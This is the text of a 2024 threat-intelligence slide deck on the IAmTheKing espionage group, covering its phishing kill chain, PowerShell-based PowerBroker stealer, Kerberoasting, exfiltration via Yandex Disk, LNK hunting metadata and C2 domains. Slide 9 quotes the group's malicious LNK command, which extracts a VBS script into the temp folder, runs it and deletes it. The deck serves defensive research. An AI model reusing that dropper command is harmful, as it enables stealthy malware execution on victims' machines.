The Lord of PowerShell: The Return of the " IAmTheKing " — презентация
logo
The Lord of PowerShell: The Return of the " IAmTheKing "
  • The Lord of PowerShell: The Return of the " IAmTheKing "
  • Hi! My name is Denis
  • IamTheKing profile
  • Only one public report
  • But a lot of attacks
  • Main TTP
  • Main kill chain in 2024
  • Each decoy contains victim profiling
  • Malicious LNK in 2024
  • My favorite file format is LNK
  • Hunting IamTheKing’s LNK files
  • Hunting IamTheKing’s LNK files
  • PowerBroker stealer
  • PowerBroker stealer. Delivery
  • PowerBroker stealer. Delivery
  • PowerBroker stealer. Delivery
  • PowerBroker stealer. Delivery
  • PowerBroker stealer. Delivery
  • PowerBroker stealer. Configuration
  • PowerBroker stealer. Collection
  • PowerBroker stealer. Kerberoasting
  • PowerBroker stealer. Stealing with « Sincerely »
  • Network infrastructure
  • Correlated groups and attacks
  • Conclusion
  • The Lord of PowerShell: The Return of the " IAmTheKing "
1/26

Первый слайд презентации: The Lord of PowerShell: The Return of the " IAmTheKing "

Denis Kuvshinov Head of Threat Intelligence department Positive Technologies

Изображение слайда

Слайд 2: Hi! My name is Denis

2 Hi! My name is Denis Security Analyst Summit 2024 Positive Technologies employee since 2017 TI & MA Regular speaker https://twitter.com/WaChinYu1

Изображение слайда

Слайд 3: IamTheKing profile

3 Security Analyst Summit 2024 Active since 2017 - ? Attacks Russian entities Main goal is espionage

Изображение слайда

Слайд 4: Only one public report

4 Security Analyst Summit 2024 https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/

Изображение слайда

Слайд 5: But a lot of attacks

5 Security Analyst Summit 2024

Изображение слайда

Слайд 6: Main TTP

6 Security Analyst Summit 2024 Initial vector Phishing from @yandex.ru, @mail.ru Execution RAR, LNK, HTML, PS, VBS, SLK Persistence Scheduler Credential access Kerberoasting Discovery (Reconnaissance) Each decoy contains profiling through remote images Collection %USR%, ( docx?|xlsx?| rtf|pdf ) C&C 3 rd level domains. Second level in 90% linked to 86.104.15.60 Exfiltration Email and Yandex disk

Изображение слайда

Слайд 7: Main kill chain in 2024

7 Security Analyst Summit 2024 Phishing Malicious attachment RAR+LNK+Decoy Powershell script Persistence in scheduler In memory payload from c2

Изображение слайда

Слайд 8: Each decoy contains victim profiling

8 Security Analyst Summit 2024

Изображение слайда

Слайд 9: Malicious LNK in 2024

9 Security Analyst Summit 2024 C:\Windows\System32\cmd.exe / v:on /c findstr " ::::::::::::. *" " резюме. lnk " > "% tmp %\honor.vbs" & cscript.exe "% tmp %\honor.vbs" & del "% tmp %\honor.vbs" - “ резюме. lnk ”

Изображение слайда

Слайд 10: My favorite file format is LNK

10 Security Analyst Summit 2024 Metadata in LNK for hunting LNK command line Creator’s machine_id Creator’s volume_id Description Creation and accessed time

Изображение слайда

Слайд 11: Hunting IamTheKing’s LNK files

11 Security Analyst Summit 2024 LNK command line Shell32.DLL,ShellExec_RunDLL % comspec %| cmd ; / v:on /c findstr "::::: Creator’s machine_id Always different Creator’s volume_id Always different Description Device Removal Creation and accessed time Always different

Изображение слайда

Слайд 12: Hunting IamTheKing’s LNK files

12 Security Analyst Summit 2024

Изображение слайда

Слайд 13: PowerBroker stealer

13 Security Analyst Summit 2024 Document collection Kerberoasting Exfiltration through Yandex disc and email

Изображение слайда

Слайд 14: PowerBroker stealer. Delivery

14 Security Analyst Summit 2024 Initial PS script C2 _1

Изображение слайда

Слайд 15: PowerBroker stealer. Delivery

15 Security Analyst Summit 2024 Initial PS script C2 _1 PS stager

Изображение слайда

Слайд 16: PowerBroker stealer. Delivery

16 Security Analyst Summit 2024 Initial PS script C2 _1 PS stager C2 _ 2 PS stager, data collector and persist provider

Изображение слайда

Слайд 17: PowerBroker stealer. Delivery

17 Security Analyst Summit 2024 Initial PS script C2 _1 PS stager C2 _ 2 PS stager, data collector and persist provider C2 _ 3_1 C2 _ 3_2 Persisted PS downloader

Изображение слайда

Слайд 18: PowerBroker stealer. Delivery

18 Security Analyst Summit 2024 Initial PS script C2 _1 PS stager C2 _ 2 PS stager, data collector and persist provider C2 _ 3_1 C2 _ 3_2 Persisted PS downloader Yandex Disk PowerBroker

Изображение слайда

Слайд 19: PowerBroker stealer. Configuration

19 Security Analyst Summit 2024

Изображение слайда

Слайд 20: PowerBroker stealer. Collection

20 Security Analyst Summit 2024

Изображение слайда

Слайд 21: PowerBroker stealer. Kerberoasting

21 Security Analyst Summit 2024

Изображение слайда

Слайд 22: PowerBroker stealer. Stealing with « Sincerely »

22 Security Analyst Summit 2024

Изображение слайда

Слайд 23: Network infrastructure

23 Security Analyst Summit 2024 … games. britishnewsmedia.com stats. thebigwideword.com images. newsgoodies.com rloj. rebugetel.com maint. addonsvile.com list. nottoolost.com …

Изображение слайда

Слайд 24: Correlated groups and attacks

24 Security Analyst Summit 2024 Powerpool IamTheKing SongXY - https://www.ptsecurity.com/ru-ru/research/analytics/cybersecurity-threatscape-2017-q4/ Dr.WEB - https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf SongXY Attacks on Russian fuel and energy industry

Изображение слайда

Слайд 25: Conclusion

25 Security Analyst Summit 2024 Quiet, attentive APT group Interested in confidential information Group tries return access to infrastructure after kicking out

Изображение слайда

Последний слайд презентации: The Lord of PowerShell: The Return of the " IAmTheKing "

Denis Kuvshinov Positive Technologies Let’s Talk?

Изображение слайда

Похожие презентации

Ничего не найдено